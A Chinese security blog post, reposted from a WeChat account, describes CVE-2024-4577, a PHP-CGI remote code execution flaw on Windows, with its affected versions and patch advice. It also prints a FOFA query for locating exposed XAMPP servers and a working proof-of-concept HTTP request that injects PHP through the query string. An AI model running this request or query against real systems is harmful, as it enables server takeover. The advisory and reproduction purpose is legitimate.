PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

admin 2024年6月11日22:23:33评论62 views字数 949阅读3分9秒阅读模式

 

0x02

产品介绍

PHP-CGI 是一种用于在 Web 服务器上运行 PHP 脚本的接口,通过 CGI(公共网关接口)将 PHP 解释器与 Web 服务器连接。
0x03

漏洞威胁

2024年6月,PHP官方发布新版本,修复了 PHP-CGI 中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全。
漏洞影响:
该漏洞可在受影响的环境下执行任意PHP代码,从而获取操作系统权限。最严重的情况下,这可能导致服务器的完全接管,敏感数据泄露,甚至将服务器转化为发起其他攻击的跳板。
影响范围:
PHP 8.3 < 8.3.8 PHP 8.2 < 8.2.20 PHP 8.1 < 8.1.29 
其他版本官方已停止维护,可根据实际情况采取相应的缓解措施。
0x04

漏洞环境

FOFA:

header="Xampps_info" || body="/xampps.jpg" || (header="location http" && header="xampp") || body="content="Kai Oswald Seidler" || title="XAMPP for" || title="XAMPP Version" || body="font-size: 1.2em; color: red;">New XAMPP"

PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

0x05

漏洞复现

POC

GET /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/x-www-form-urlencodedREDIRECT-STATUS:1<?php print(123*123);?>

 该poc仅适用于XAMPP默认配置

PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

 

原文始发于微信公众号(冷漠安全):「漏洞复现」PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月11日22:23:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)https://cn-sec.com/archives/2838996.html

发表评论

匿名网友 填写信息